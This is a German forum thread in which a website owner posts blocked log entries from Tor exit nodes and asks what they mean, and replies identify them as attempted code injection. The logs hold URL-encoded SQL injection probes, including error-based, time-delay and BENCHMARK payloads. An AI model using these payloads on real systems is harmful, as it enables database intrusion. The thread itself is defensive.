Webseitenangriff aus dem Tor Netzwerk.

HyBird · 31.03.2014, 21:28

Ich betreibe meine Homepage schon seit langer Zeit. Joomla Updates werden immer Zeitnah eingespielt. Einen Hack konnte ich bisher nicht feststellen.
Jedoch kommen aus dem Tornetzwerk seltsame Seitenaufrufe die ich nicht kapiere.
Diese Aufrufe werden von dem Pagerestrictor Skript von Botfrei.de bisher erfolgreich geblockt. Dennoch würde ich gerne wissen, was diese seltsamen Seitenaufrufe
zu bedeuten haben. Vesucht hier jemand Code einzuschleusen?

Das Log hat folgendes Format: Datum, Zeit, IP-Adresse, Hostname, Clientname und Zieladresse die aufgerufen wird und den Sperrgrund.

Code:

ATTFilter

13.03.2014 16:45:04 - 96.44.189.102 herngaard.torservers.net - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Media Center PC 6.0; FDM) -  - www.pc-doktor-bonn.de/ihre-meinung?start=convert%28int%2Cdb_name%28%29%29-- - iprange - 96.44.189.0/96.44.189.255 - ?
13.03.2014 16:45:06 - 96.44.189.102 herngaard.torservers.net - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Media Center PC 6.0; FDM) -  - www.pc-doktor-bonn.de/ihre-meinung?start=45%27%20or%201%3Dconvert%28int%2Cdb_name%28%29%29-- - iprange - 96.44.189.0/96.44.189.255 - ?
13.03.2014 16:45:08 - 96.44.189.102 herngaard.torservers.net - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Media Center PC 6.0; FDM) -  - www.pc-doktor-bonn.de/ihre-meinung?start=45%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A01%3A07%27-- - iprange - 96.44.189.0/96.44.189.255 - ?
13.03.2014 16:45:12 - 96.44.189.102 herngaard.torservers.net - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Media Center PC 6.0; FDM) -  - www.pc-doktor-bonn.de/ihre-meinung?start=45%27%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A01%3A07%27-- - iprange - 96.44.189.0/96.44.189.255 - ?
13.03.2014 16:45:14 - 96.47.226.22 wannabe.torservers.net - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Media Center PC 6.0; FDM) -  - www.pc-doktor-bonn.de/ihre-meinung?start=45%20and%20%2F*%2130000if%281%3D1%2CBENCHMARK%28116667200%2CMD5%280x41%29%29%2C0%29*%2F - iprange - 96.47.224.0/96.47.226.255 - ?
13.03.2014 16:45:15 - 96.47.226.22 wannabe.torservers.net - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Media Center PC 6.0; FDM) -  - www.pc-doktor-bonn.de/ihre-meinung?start=45%27%20and%20%2F*%2130000if%281%3D1%2CBENCHMARK%28116667200%2CMD5%280x41%29%29%2C0%29*%2F%20and%20%27x%27%3D%27x - iprange - 96.47.224.0/96.47.226.255 - ?
13.03.2014 16:45:17 - 96.47.226.22 wannabe.torservers.net - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Media Center PC 6.0; FDM) -  - www.pc-doktor-bonn.de/ihre-meinung?start=45%27%20or%201%3Dconvert%28int%2C%28select%20concat%28version%28%29%2C0x7233646D3076335F73716C5F696E6A656374696F6E%29%29%29-- - iprange - 96.47.224.0/96.47.226.255 - ?
13.03.2014 16:45:19 - 96.47.226.22 wannabe.torservers.net - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Media Center PC 6.0; FDM) -  - www.pc-doktor-bonn.de/ihre-meinung?start=45%27%20or%201%3Dconvert%28int%2C%28select%20cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bChar%28110%29%2bChar%28106%29%2bChar%28101%29%2bChar%2899%29%2bChar%28116%29%2bChar%28105%29%2bChar%28111%29%2bChar%28110%29%20as%20nvarchar%284000%29%29%29%29-- - iprange - 96.47.224.0/96.47.226.255 - ?
13.03.2014 16:45:20 - 96.47.226.22 wannabe.torservers.net - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Media Center PC 6.0; FDM) -  - www.pc-doktor-bonn.de/ihre-meinung?start=45%27%20or%201%3Dconvert%28int%2Cchr%28114%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28109%29%7C%7Cchr%2848%29%7C%7Cchr%28118%29%7C%7Cchr%2851%29%7C%7Cchr%2895%29%7C%7Cchr%28104%29%7C%7Cchr%28118%29%7C%7Cchr%28106%29%7C%7Cchr%2895%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28106%29%7C%7Cchr%28101%29%7C%7Cchr%2899%29%7C%7Cchr%28116%29%7C%7Cchr%28105%29%7C%7Cchr%28111%29%7C%7Cchr%28110%29%29-- - iprange - 96.47.224.0/96.47.226.255 - ?

Ich finde es irgendwie Gruselig. Vielleicht kann mir einer erklären was hier versucht wird.

Danke im Vorraus.

Alois S · 04.04.2014, 01:29

Hallo HyBird ,

naja, was soll ich da schon Großartiges dazu sagen können?:

Es handelt sich hierbei um ExitNodes des Tor-Netzwerks, also um Proxyserver mit fester IP, die von allen "Mitgliedern" benutzt werden können;

beide stehen schon mehrfach auf diversen Blacklists, wie du z.B. hier einsehen kannst:

http://whatismyipaddress.com/ip/96.44.189.102

(einfach Adresse eingeben und auf "BlacklistCheck" klicken)

Welche Absichten die Leute jedoch tatsächlich im Einzelfall haben bzw. haben könnten - das lässt sich wohl leider nie wirklich herausfinden.....

Liebe Grüße, Alois

mort · 04.04.2014, 07:55

Zitat:

Vesucht hier jemand Code einzuschleusen?

Ja. Hier wird versucht etwas in der Datenbank zu ändern bzw. etwas zu bekommen.

Webseitenangriff aus dem Tor Netzwerk.

Diskussionsforum: Webseitenangriff aus dem Tor Netzwerk.